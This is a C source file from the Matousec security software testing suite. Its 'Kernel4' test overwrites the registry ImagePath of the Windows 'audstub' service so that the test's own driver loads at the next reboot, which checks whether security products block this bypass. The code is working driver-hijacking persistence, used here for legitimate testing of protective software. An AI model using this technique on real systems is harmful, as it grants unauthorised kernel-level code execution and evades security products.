/*

 Security Software Testing Suite - Kernel4 (General bypassing test)
 Copyright by www.matousec.com, Different Internet Experience Ltd.
 http://www.matousec.com/


 Method description:

   * It is assumed that the system "audstub" driver is started automatically.

   * Change "ImagePath" value of the system "audstub" driver to our driver.

   * After the reboot our driver will be loaded.

*/


#include <stdio.h>
#include <windows.h>
#include "include/common.h"
#include "include/common-hook.h"


int main(int argc,char **argv)
{
  COM_CONF conf;
  if (!com_console_init_main("Kernel4","kernel4",argc,argv,&conf,COM_TEST_TYPE_KERNEL4)) return 1;

  char *used_dlls[]={"advapi32.dll"};
  if (!com_hook_load_libraries(used_dlls,1)) return 1;

  COM_ERROR err_inf;
  err_inf.occurred=FALSE;

  int res=FALSE;

  char cur_dir[MAX_PATH];
  if (com_get_module_path(NULL,cur_dir,sizeof(cur_dir),&err_inf))
  {
    char drv_bin[MAX_PATH];
    snprintf(drv_bin,sizeof(drv_bin),"\\??\\%s\\drv.sys",cur_dir);
    drv_bin[sizeof(drv_bin)-1]='\0';

    HKEY hkey;
    LONG ret=RegOpenKeyEx(HKEY_LOCAL_MACHINE,"SYSTEM\\CurrentControlSet\\Services\\audstub",0,KEY_SET_VALUE,&hkey);
    if (ret==ERROR_SUCCESS)
    {
      if (com_verbosity_get()) printf("Registry key \"HKLM\\SYSTEM\\CurrentControlSet\\Services\\audstub\" opened.\n");

      ret=RegSetValueEx(hkey,"ImagePath",0,REG_EXPAND_SZ,drv_bin,strlen(drv_bin)+1);
      if (ret==ERROR_SUCCESS)
      {
        printf("Driver installed. Reboot the machine to load driver.\n");
        res=TRUE;
      } else com_err_set_sc(&err_inf,ret,"Unable to set value \"ImagePath\" under \"HKLM\\SYSTEM\\CurrentControlSet\\Services\\audstub\".\n");

      RegCloseKey(hkey);
    } else com_err_set_sc(&err_inf,ret,"Unable to open key \"HKLM\\SYSTEM\\CurrentControlSet\\Services\\audstub\".\n");
  }

  return com_end(res,&err_inf,&conf);
}
